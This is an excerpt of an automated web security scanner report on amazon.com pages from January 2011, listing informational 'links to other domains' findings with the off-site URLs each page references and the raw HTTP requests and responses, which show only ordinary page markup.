http://www.dpreview.com/
http://www.endless.com/
http://www.fabric.com/
http://www.imdb.com/
http://www.shopbop.com/welcome
http://www.smallparts.com/
http://www.warehousedeals.com/
http://www.woot.com/
http://www.zappos.com/
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-10089555225.js._V173906659_.js
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-5791285623.css._V173906657_.css
http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/websiteGridCSS/websiteGridCSS-websiteGridCSS-8253._V186639940_.css
http://z-ecx.images-amazon.com/images/G/01/s9-campaigns/s9-widget-seeded._V172703431_.css
http://z-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:03:36 GMT
Server: Server
x-amz-id-1: 1RQGNQ6WM7Y4MS66G38B
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: +r+poGKg+6bD50on5oekljcjzy+nvcyzjWwpkxQMpxCaWBoeQj7sCKT1NNVYKm6p
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=189-7332499-5529366; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 135637

<html>
<head>

<style type="text/css">
...[SNIP]...
<a name="navSwmSkedPop|he|navSwmSkedPop_content"><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" class="default navSprite" id="navSwmFlyoutImage" height="1" border="0" /></a>
...[SNIP]...
<div id="navSaGwBody" class="navSaNonJs">
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" height="1" width="173" class="navSaGwForceWidth" alt=""/>
<script type="text/javascript">
...[SNIP]...
</map><img src="http://g-ecx.images-amazon.com/images/G/01/camera/gw/camera-3dcams_300x75._V172108031_.jpg" width="300" align="center" usemap="#CE-0800_3D_GW" alt="3D Cameras and Camcorders" height="75" border="0" /></td>
...[SNIP]...
Dlpo%255Fixgwamuscaen-21&token=AD297DDA0F9D6C887976CD08894B02DB57139A39&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-intl-crossover-0&pf_rd_r=1RQGNQ6WM7Y4MS66G38B&pf_rd_t=101&pf_rd_p=499834531&pf_rd_i=507846"><img src="http://g-ecx.images-amazon.com/images/G/01/gateway/visit_amazon_ca_tcg._V229026943_.gif" align="center" alt="Shop at Amazon.ca" border="0" /></a>
...[SNIP]...
</map><img src="http://g-ecx.images-amazon.com/images/G/01/kindle/merch/gw/shasta/shasta-gw-bestselling-475x275._V172146981_.jpg" width="475" align="center" usemap="#kindleC2" alt="Kindle, the #1 Bestselling Product on Amazon" height="275" border="0" /></td>
...[SNIP]...
<div class="amabot_center" id="centercol">

<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" style="display:block" alt="" width="1" id="ATFMarker" onload="if (typeof uet == 'function') { uet('af'); } var gwatfcol = document.getElementById('center1'); if (gwatfcol == null) { gwatfcol = document.getElementById('centercol'); } if (gwatfcol != null) { var gwatfcolimg = gwatfcol.getElementsByTagName('img'); if (gwatfcolimg != null) { registerCSMEvent('cf', gwatfcolimg); } } for (var i=0;i<gwEH._f.length;i++) { try { gwEH._f[i](); } catch (e) {} } gwEH.afterFold = function(callback) { callback(); }"/>

<script type="text/javascript">
...[SNIP]...
</script>

<script type="text/javascript" src="http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-10089555225.js._V173906659_.js"></script>
...[SNIP]...
</script>

<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/s9-campaigns/s9-widget-seeded._V172703431_.css"/><div class="unified_widget rcm widget small_heading">
...[SNIP]...
<div class="imageContainer"><img src="http://ecx.images-amazon.com/images/I/51PDazJ4nCL._SL135_.jpg" alt="" width="135" height="135" id="ns_1RQGNQ6WM7Y4MS66G38B_15634_r0Image0" /></div>
...[SNIP]...
B0043X8SNQ&DownloadLocation=SEARCH" onclick="return ns_1RQGNQ6WM7Y4MS66G38B_15634__S9MusicPlayer.trackPreviewPressed('B0043X8SNQ');" style="width: 135px; position: absolute; top: 108px; left: 0;">
<img id="ns_1RQGNQ6WM7Y4MS66G38B_15634_trackPreviewB0043X8SNQ" class="s9_trackPreviewButton" align="absmiddle" width="22" height="22" border="0" title="Sample" alt="Sample" src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V42752373_.gif"/>
<span id="ns_1RQGNQ6WM7Y4MS66G38B_15634_trackLabelB0043X8SNQ" class="tiny s9_trackPreviewLabel" style="width: 109px; _padding-top: 9px">
...[SNIP]...
<div class="imageContainer"><img src="http://ecx.images-amazon.com/images/I/41eVCRbPx7L._SL135_.jpg" alt="" width="135" height="98" id="ns_1RQGNQ6WM7Y4MS66G38B_15634_r0Image1" style="margin-top: 19px; margin-bottom:18px;" /></div>
...[SNIP]...
<div class="imageContainer"><img src="http://ecx.images-amazon.com/images/I/41-qiAEzE4L._SL135_.jpg" alt="" width="90" height="135" id="ns_1RQGNQ6WM7Y4MS66G38B_15634_r0Image2" /></div>
...[SNIP]...
<div class="imageContainer"><img src="http://z-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" url="http://ecx.images-amazon.com/images/I/51993R08WLL._SL135_.jpg" alt="" width="135" height="135" id="ns_1RQGNQ6WM7Y4MS66G38B_15634_r0Image3" /></div>
...[SNIP]...
<div class="imageContainer"><img src="http://z-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" url="http://ecx.images-amazon.com/images/I/51NVt3k0uPL._SL135_.jpg" alt="" width="85" height="135" id="ns_1RQGNQ6WM7Y4MS66G38B_15634_r0Image4" /></div>
...[SNIP]...
<div class="imageContainer"><img src="http://z-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" url="http://ecx.images-amazon.com/images/I/51jLKJgexYL._SL135_.jpg" alt="" width="88" height="135" id="ns_1RQGNQ6WM7Y4MS66G38B_15634_r0Image5" /></div>
...[SNIP]...
<div class="imageContainer"><img src="http://z-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" url="http://ecx.images-amazon.com/images/I/51dC8RRX2UL._SL135_.jpg" alt="" width="133" height="135" id="ns_1RQGNQ6WM7Y4MS66G38B_15634_r0Image6" /></div>
...[SNIP]...
<div class="imageContainer"><img src="http://ecx.images-amazon.com/images/I/41LxZAhgkcL._SL135_.jpg" alt="" width="135" height="101" id="ns_1RQGNQ6WM7Y4MS66G38B_15635_r0Image0" style="margin-top: 17px; margin-bottom:17px;" /></div>
...[SNIP]...
<div class="imageContainer"><img src="http://ecx.images-amazon.com/images/I/41mObreJEQL._SL135_.jpg" alt="" width="135" height="135" id="ns_1RQGNQ6WM7Y4MS66G38B_15635_r0Image1" /></div>
...[SNIP]...
<div class="imageContainer"><img src="http://ecx.images-amazon.com/images/I/41eDq%2BYYvyL._SL135_.jpg" alt="" width="135" height="94" id="ns_1RQGNQ6WM7Y4MS66G38B_15635_r0Image2" style="margin-top: 21px; margin-bottom:20px;" /></div>
...[SNIP]...
<div class="imageContainer"><img src="http://z-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" url="http://ecx.images-amazon.com/images/I/51yomC0EodL._SL135_.jpg" alt="" width="135" height="101" id="ns_1RQGNQ6WM7Y4MS66G38B_15635_r0Image3" style="margin-top: 17px; margin-bottom:17px;" /></div>
...[SNIP]...
<div class="imageContainer"><img src="http://z-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" url="http://ecx.images-amazon.com/images/I/41j5TvkXZyL._SL135_.jpg" alt="" width="135" height="96" id="ns_1RQGNQ6WM7Y4MS66G38B_15635_r0Image4" style="margin-top: 20px; margin-bottom:19px;" /></div>
...[SNIP]...
<div class="imageContainer"><img src="http://z-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" url="http://ecx.images-amazon.com/images/I/41vrFBQnlAL._SL135_.jpg" alt="" width="135" height="90" id="ns_1RQGNQ6WM7Y4MS66G38B_15635_r0Image5" style="margin-top: 23px; margin-bottom:22px;" /></div>
...[SNIP]...
<div class="imageContainer"><img src="http://z-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" url="http://ecx.images-amazon.com/images/I/519sTrkvwqL._SL135_.jpg" alt="" width="135" height="90" id="ns_1RQGNQ6WM7Y4MS66G38B_15635_r0Image6" style="margin-top: 23px; margin-bottom:22px;" /></div>
...[SNIP]...
08951_2/189-7332499-5529366?ie=UTF8&node=565108&field-keywords=acer&emi=ATVPDKIKX0DER&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-4&pf_rd_r=1RQGNQ6WM7Y4MS66G38B&pf_rd_t=101&pf_rd_p=1269770282&pf_rd_i=507846"><img src="http://g-ecx.images-amazon.com/images/G/01/electronics/detail-page/asus-2._V189604747_.gif" width="120" alt="Acer" height="120" border="0" /></a>
...[SNIP]...
08951_4/189-7332499-5529366?ie=UTF8&node=565108&field-keywords=dell&emi=ATVPDKIKX0DER&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-4&pf_rd_r=1RQGNQ6WM7Y4MS66G38B&pf_rd_t=101&pf_rd_p=1269770282&pf_rd_i=507846"><img src="http://g-ecx.images-amazon.com/images/G/01/electronics/detail-page/dell._V189604740_.gif" width="120" alt="Dell" height="120" border="0" /></a>
...[SNIP]...
_link_85008951_6/189-7332499-5529366?ie=UTF8&node=565108&brand=ASUS&emi=ATVPDKIKX0DER&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=center-4&pf_rd_r=1RQGNQ6WM7Y4MS66G38B&pf_rd_t=101&pf_rd_p=1269770282&pf_rd_i=507846"><img src="http://g-ecx.images-amazon.com/images/G/01/electronics/detail-page/asus._V189604750_.gif" width="120" alt="ASUS" height="120" border="0" /></a>
...[SNIP]...
</map><img src="http://g-ecx.images-amazon.com/images/G/01/img10/software/300-column/turbo_tax_2010_300x120._V196727518_.jpg" width="300" align="center" usemap="#TT_2010" alt="TurboTax 2010" height="120" border="0" /></td>
...[SNIP]...
</map><img src="http://g-ecx.images-amazon.com/images/G/01/amazon-credit/consumer/visa_gateway_300_4._V192208236_.gif" width="300" align="center" usemap="#amazon-visa-roto" alt="Amazon.com Rewards Visa Card" height="120" border="0" /></td>
...[SNIP]...
<a href="/ref=footer_logo/189-7332499-5529366"><img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif" width="126" alt="amazon.com" height="24" border="0" /></a>
...[SNIP]...
<div class="navFooterLine navFooterLinkLine navFooterPadItemLine">
<a href="http://www.amazon.ca">Canada</a>
<a href="http://www.amazon.cn">China</a>
<a href="http://www.amazon.fr">France</a>
<a href="http://www.amazon.de">Germany</a>
<a href="http://www.amazon.it">Italy</a>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.audible.com">Audible<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.dpreview.com">DPReview<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.endless.com">Endless<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.fabric.com">Fabric<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.imdb.com">IMDb<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.shopbop.com/welcome">Shopbop<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.smallparts.com">Small Parts<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.warehousedeals.com">Warehouse Deals<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.woot.com">Woot<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.zappos.com">Zappos<br/>
...[SNIP]...
</script>

<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/s9-campaigns/s9-widget-seeded._V172703431_.css' rel='stylesheet'>
<script type='text/javascript'>
...[SNIP]...

20.546. http://www.amazon.com/books-used-books-textbooks/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.amazon.com
Path:	/books-used-books-textbooks/b

Issue detail

The page was loaded from a URL containing a query string:

http://www.amazon.com/books-used-books-textbooks/b?ie\\x3dUTF8\\x26amp;node\\x3d283155\\x22

The response contains the following links to other domains:

http://g-ecx.images-amazon.com/images/G/01/x-locale/common/kailey-kitty._V192239871_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/common/orange-arrow._V192240581_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/common/small-logo._V192240376_.gif

Request

GET /books-used-books-textbooks/b?ie\\x3dUTF8\\x26amp;node\\x3d283155\\x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 NotFound
Date: Mon, 24 Jan 2011 16:03:25 GMT
Server: Server
x-amz-id-1: 1HEB1A0Z6SR1AGWZCDG1
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: mTv6Nc2Bk4AlMl7E7LJohDMhVhB+NZJVpCayy7BlqRi0V4A5rRpGMEng83u5V2ZA
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=179-6325389-4908850; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 18638

<html>
<head>

<style type="text/css"><!--
.serif { font-family: times,serif; font-size: small; }
.sans { font-family: verdana,arial,helvetica,sans-serif; font-size: small; }
.small { font-fami
...[SNIP]...
<a href="/179-6325389-4908850"><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/small-logo._V192240376_.gif" width="142" height="31" border="0" /></a>
...[SNIP]...
<td>
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/kailey-kitty._V192239871_.gif" width="40" height="35" border="0" />
</td>
...[SNIP]...
<br />
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/orange-arrow._V192240581_.gif" width="10" height="9" border="0" />
<b>
...[SNIP]...

20.547. http://www.amazon.com/dp/0313363153 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.amazon.com
Path:	/dp/0313363153

Issue detail

The page was loaded from a URL containing a query string:

http://www.amazon.com/dp/0313363153?tag=parenthoodcom-20&camp=211493&creative=379981&linkCode=op1&creativeASIN=0313363153&adid=1E43GGA9XAJKCAEXAPNZ&

The response contains the following links to other domains:

http://ace.advertising.com/site=739494/bnum=85665492/size=728090/tags=1/optn=1;ord=75418?
http://d2lo25i6d3q8zm.cloudfront.net/browser-plugins/AmazonSearchSuggestionsOSD.DPIE.xml
http://ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif
http://ecx.images-amazon.com/images/I/415RG3wyr9L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/41m7wQTxoDL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/5149K3WJ6FL._SL500_SS100_.jpg
http://ecx.images-amazon.com/images/I/5149K3WJ6FL._SL75_SS50_.jpg
http://ecx.images-amazon.com/images/I/51CqnjvjUaL._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg
http://ecx.images-amazon.com/images/I/51CqnjvjUaL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg
http://ecx.images-amazon.com/images/I/51KP97slJ7L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/51KP97slJ7L._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg
http://ecx.images-amazon.com/images/I/51ORZtvZaBL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/51ORZtvZaBL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg
http://ecx.images-amazon.com/images/I/51ttkM3voAL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://g-ecx.images-amazon.com/images/G/01/advertising/banners/grocery_728x90._V192205351_.gif
http://g-ecx.images-amazon.com/images/G/01/gateway/iab/advertisement-sm-head._V192575712_.gif
http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif
http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-16._V212310439_.png
http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif
http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif
http://g-ecx.images-amazon.com/images/G/01/tradein/buttons/button_tradein_here._V192193387_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-label._V192195535_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195480_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195483_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/common/orange-arrow._V192240581_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reputation/suggestionbox._V192249929_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/cfm._V192249942_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-bl._V192199724_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-br._V192253272_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tl._V192253278_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tr._V192253274_.gif
http://www.amazon.ca/
http://www.amazon.cn/
http://www.amazon.de/
http://www.amazon.fr/
http://www.amazon.it/
http://www.audible.com/
http://www.dpreview.com/
http://www.endless.com/
http://www.fabric.com/
http://www.imdb.com/
http://www.shopbop.com/welcome
http://www.smallparts.com/
http://www.warehousedeals.com/
http://www.woot.com/
http://www.zappos.com/
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/accessoriesCSS/US-combined-2965960588.css._V172139020_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/dpMergedOverallCSS/dpMergedOverallCSS-8314507502.css._V196183329_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/fruitCSS/US-combined-1434113735.css._V175075384_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/gridCSS/US-combined-1136328220.css._V175075348_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-5791285623.css._V173906657_.css
http://z-ecx.images-amazon.com/images/G/01/kitchen/scheduled-delivery/sd_style-v1.1.1.0._V200598425_.css
http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/ciuCSS/ciuCSS-ciuAnnotations-155.css._V174809499_.css
http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/dpCSS/US/combined-3484246616._V196377856_.css
http://z-ecx.images-amazon.com/images/G/01/productAds/css/detailPageStatic._V175408788_.css
http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-4._V196325517_.css
http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css

Request

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:06:18 GMT
Server: Server
x-amz-id-1: 1XEKQW5VKEVTKXS2HSJA
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: XeWIrG239x/NdCZhKVLDJEcUlefLzu6eYfgdzbR7oX4dl76GDeDVLHHKaEiGy4dJ
Vary: Accept-Encoding,User-Agent
nnCoection: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=188-3368164-3583051; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=cNF169Ic3p+FLZlmECYIuJwUEnmMidNZpqOMXJlzFfyGkoLR/f0WF8vs6ZQU5HX+qBwE7qqoL3t9fdNtjPj3gyYsZ9OPP64Bj28wuj43iGA+RQm2aZs0leyoMSaGWoAmLLFT4m57m2mg/M9gT8m8zgH4Tc7xnQpx7XV0ybHDfWS2rJ30owc8Rfy1J4pUKTmIEUgNrK9xS2pwjtjSqsQvCH98yL0TxvhtC5sb3N+5Hsbf09QrIa+pq7nenC2PQqxud5/rAY2tUqp08BC6AQqUm9FRfG4U//pmCE8P+Nf4Ay6b7r0qWful6/GAXYGc9NJ8UFNtl8lIxNbvvKSGUwWxMFhHe2yFoXqfgLXGtAif6/GMRqdmxDwAFvFgrcU5U0NDFanauf5u8xPOR/t4Rw9yAVQVnhKW/N98x8jGOU9360lRgvHsw0R7W92mPEKiYj0h57Jn/qFxIY4=; path=/; domain=.amazon.com; expires=Tue Feb 01 14:06:18 2011 GMT
Content-Length: 369008

<html>
<head>

<style type="text/css">
...[SNIP]...
<div id="rwImages_hidden" style="display:none;">
<img src="http://ecx.images-amazon.com/images/I/51CqnjvjUaL._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg" style="display:none;"/>
</div>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tl._V192253278_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableTop"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tr._V192253274_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<td class="subsDPTableLeft"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td class="subsDPTableRight"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-bl._V192199724_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableBottom"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-br._V192253272_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<a href="https://www.amazon.com/gp/tradein/add-to-cart.html/ref=trade_new_dp_trade_btn?ie=UTF8&asin=0313363153"><img src="http://g-ecx.images-amazon.com/images/G/01/tradein/buttons/button_tradein_here._V192193387_.gif" width="84" align="absmiddle" height="17" border="0" /></a>
...[SNIP]...
<a href="/gp/reader/0313363153/ref=sib_dp_pt#reader-link" onclick="if (typeof(SitbReader) != 'undefined') { SitbReader.LightboxActions.openReader('sib_dp_pt'); return false; }"><img onload="if (typeof uet == 'function') { uet('af'); }" src="http://ecx.images-amazon.com/images/I/51CqnjvjUaL._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg" id="prodImage" width="300" height="300" onMouseOver="sitb_showLayer('bookpopover'); return false;" onMouseOut="sitb_doHide('bookpopover'); return false;" border="0" alt="Breaking Free, Starting Over: Parenting in the Aftermath of Family Violence" onmouseover="" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Breaking-Free-Starting-Over-Parenting/dp/0313363153/ref=pd_bxgy_b_img_a"><img src="http://ecx.images-amazon.com/images/I/51CqnjvjUaL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg" width="75" alt="Breaking Free, Starting Over: Parenting in the Aftermath of Family Violence" id="bxgy_img_a" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/When-Dad-Hurts-Mom-Witnessing/dp/0425200310/ref=pd_bxgy_b_img_b"><img src="http://ecx.images-amazon.com/images/I/51ORZtvZaBL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="75" alt="When Dad Hurts Mom: Helping Your Children Heal the Wounds of Witnessing Abuse" id="bxgy_img_b" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Why-Does-He-That-Controlling/dp/0425191656/ref=pd_bxgy_b_img_c"><img src="http://ecx.images-amazon.com/images/I/51KP97slJ7L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="75" alt="Why Does He Do That?: Inside the Minds of Angry and Controlling Men" id="bxgy_img_c" height="75" border="0" /></a>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51ORZtvZaBL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51KP97slJ7L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/415RG3wyr9L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41m7wQTxoDL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/5149K3WJ6FL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51ttkM3voAL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div style="display: none" class="CustomerPopover_load"><img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-label._V192195535_.gif" width="73" alt="Loading…" height="14" border="0" /></div>
...[SNIP]...
<noscript>
<link type="text/css" rel="stylesheet" href="http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css" />
</noscript>
...[SNIP]...
</div>

<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/cfm._V192249942_.gif" width="1" alt="" onload="if (typeof uet == 'function') { uet('cf'); }" height="1" border="0" />

<br />
...[SNIP]...
<div style="display:none;" id="cg-div">
<img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" /><img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" />
</div>
...[SNIP]...
<div class="s9DpEntity" id="s9DpEntity" style="height: 200px;"><img style='padding-left: 130px; padding-top: 20px;' src='http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195483_.gif' alt='loading' /><noscript>
...[SNIP]...
</ul><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/orange-arrow._V192240581_.gif" width="10" height="9" border="0" />

<a href="http://www.amazon.com/Breaking-Free-Starting-Over-Parenting/dp/book-citations/0313363153/ref=sid_dp_av/188-3368164-3583051?ie=UTF8&citeType=citing#citing">
...[SNIP]...
<td valign="top" class="faceout"><img src="http://ecx.images-amazon.com/images/I/51CqnjvjUaL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg" width="50" alt="Breaking Free, Starting Over: Parenting in the Aftermath of Family Violence" height="50" border="0" /></td>
...[SNIP]...
